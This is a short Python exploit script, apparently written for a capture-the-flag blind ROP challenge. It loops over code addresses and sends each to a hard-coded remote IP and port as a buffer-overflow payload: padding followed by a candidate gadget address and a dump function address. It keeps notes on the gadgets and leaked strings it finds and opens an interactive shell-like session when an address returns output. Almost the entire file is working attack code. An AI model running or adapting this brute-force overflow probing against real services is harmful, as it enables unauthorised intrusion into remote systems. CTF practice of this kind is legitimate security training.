from ptrlib import *
import timeout_decorator

@timeout_decorator.timeout(1.5)
def recvline(sock):
    return sock.recvline()

libc = ELF("libc-2.23.so")

addr_dump = 0x40070e

"""
gadget
0x400621, 0x400622, 0x400623, 0x400626, 0x400627, 0x400628
0x400630, 0x400635
0x400669, 0x40066a, 0x40066b, 0x40066c
0x400670, 0x400677, 0x400679
0x400683, 0x400684, 0x400689, 0x40068a, 0x40068b, 0x40068c
0x400690, 0x400695, 0x400696, 0x400699, 0x40069b, 0x40069c, 0x40069d
0x4006a0
0x4006b1
0x40072a
0x400759, 0x40075b, 0x40075c
0x400760, 0x400761
0x4007af
0x4007c4, 0x4007c5, 0x4007c6, 0x4007c7, 0x4007c8, 0x4007cf
0x4007d0, 0x4007d1, 0x4007d4, 0x4007dc
"""
"""
dump
0x400713, 0x40071f, 0x4006fb --> gadbage dump
0x40071a --> "No password for you!"
0x4007aa --> safe "Do not dump my memory!"
"""
"""
main
0x4006b6, 0x4006b7, 0x4006b8, 0x4006ba
0x4006ce
0x4007bb
0x4006e2
0x4006f6
"""

logger.level = 0
for addr in range(0x400621, 0x402000):
    print(hex(addr))
    payload = b"A"*0x58 + p64(addr) + p64(addr_dump)
    sock = Socket("35.246.158.241", 32131)
    sock.sendafter("friend?\n", payload)
    try:
        print(recvline(sock))
    except timeout_decorator.TimeoutError:
        sock.close()
        continue
    sock.interactive()
